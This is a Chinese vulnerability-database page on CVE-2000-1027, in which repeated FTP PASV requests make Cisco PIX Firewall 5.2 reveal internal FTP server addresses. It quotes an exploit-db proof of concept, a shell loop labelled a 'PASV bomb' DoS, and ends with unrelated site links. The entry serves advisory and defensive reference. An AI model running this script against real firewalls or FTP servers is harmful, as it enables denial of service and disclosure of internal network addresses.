Cisco Secure PIX Firewall漏洞-安全小百科

Cisco Secure PIX Firewall漏洞

漏洞ID	1106023	漏洞类型	未知
发布时间	2000-10-03	更新时间	2005-05-02
CVE编号	CVE-2000-1027	CNNVD-ID	CNNVD-200012-075
漏洞平台	Hardware	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/20369
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-075

|漏洞详情

CiscoSecurePIXFirewall5.2(2)版本存在漏洞。远程攻击者可以利用PASV请求淹没服务器来确定目标FTP服务器的真实IP地址，该请求在制定确定模式下在响应中包含真实IP地址。

|漏洞EXP

source: http://www.securityfocus.com/bid/1877/info

The Cisco PIX is a popular firewall network device. 

It is possible to configure the PIX so that it hides the IP address of internal ftp servers from clients connecting to it. By sending a number of requests to enter passive ftp mode (PASV) during an ftp session, the IP address will eventually be disclosed. It is not known what exactly causes this condition.

This has been verified on versions 5.2(4) and 5.2(2) of the PIX firmware and probably affects other versions.


# sent by: Fabio Pietrosanti (naif) <[email protected]>
# try to dos pix using PASV bomb

echo "USER ftptest99"
sleep 2
echo PASS ftptest99
sleep 2
echo SYST
while true
       do

            echo PASV
            sleep 1
            echo PASV
            echo PASV
            sleep 1
            echo PASV
            echo PASV
            sleep 1
            echo PASV
           echo PASV
            sleep 1
done

|参考资料

来源:BID
名称:1877
链接:http://www.securityfocus.com/bid/1877
来源:BUGTRAQ
名称:20001003CiscoPIXFirewallallowexternaluserstodiscoverinternalIPs
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=97059440000367&w;=2
来源:XF
名称:cisco-pix-reveal-address
链接:http://xforce.iss.net/static/5646.php
来源:OSVDB
名称:1623
链接:http://www.osvdb.org/1623

相关推荐: Verity K2 Toolkit Cross-Site Scripting Vulnerability

Verity K2 Toolkit Cross-Site Scripting Vulnerability 漏洞ID 1099960 漏洞类型 Input Validation Error 发布时间 2003-07-02 更新时间 2003-07-02 CVE编…

文章版权归作者所有，未经允许请勿转载。

THE END

网络安全漏洞
# 漏洞 # cnnvd # cisco

喜欢就支持一下吧

Cisco Secure PIX Firewall漏洞

Cisco Secure PIX Firewall漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

日常避险攻略

紧张局势重大升级！“第三次世界大战威胁迫近”

ChatGPT问答: RiscV 汇编怎么写 1到100 数字之和代码 RISC-V 汇编语言入门 add, sub, lw, sw, j 常用指令

RARS 汇编模拟器支持的RISC-V指令

使用FFMPEG快速替换视频中的音频

2023.03.26 我去年买了个表，一直走不准，现在终于可以设置时间了

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

WebcamXP信息字段HTML代码注入漏洞

TrendMicro Virus Control System配置受到威胁

Messagerie 1.0 – Arbitrary User Removal Denial of Service

Linux内核多个漏洞

Make-a-Store OrderPage购物车应用程序信息修改漏洞

网络视频服务 Telly 数据库配置不当暴露 800 万用户、700G 敏感数据

付费下载测试

zibll子比主题 v5.6最新免授权版

创建不做身份鉴定的HTTPClient发送HTTPS的POST请求的工具类，解决异常：sun.security.validator.ValidatorException: PKIX path vali

Python网络开发简单的IP城市定位WebAPI

Attack tive Directory – 作者:sec875

免费领爱企查两年会员

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa